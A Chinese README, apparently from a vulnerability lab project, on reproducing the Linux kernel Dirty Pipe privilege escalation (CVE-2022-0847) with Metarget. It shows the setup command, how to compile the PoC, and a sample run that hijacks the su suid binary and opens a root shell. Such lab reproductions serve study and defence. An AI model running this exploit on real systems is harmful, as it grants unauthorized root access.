Skip to content

Latest commit

 

History

History
37 lines (26 loc) · 708 Bytes

File metadata and controls

37 lines (26 loc) · 708 Bytes

Linux内核漏洞导致权限提升(CVE-2022-0847)

场景介绍

请参考Max Kellermann的文章,下文的PoC出自dirtypipez.c

环境搭建

宿主机环境:

  • Ubuntu 18.04

首先切换内核,直接通过Metarget安装环境

./metarget cnv install cve-2022-0847 --verbose

漏洞复现

gcc -o poc poc.c

编译好poc.c,执行即可。例如:

ubuntu@test:~$ ls
poc  poc.c
ubuntu@test:~$ ./poc `which su`
[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))
# whoami
root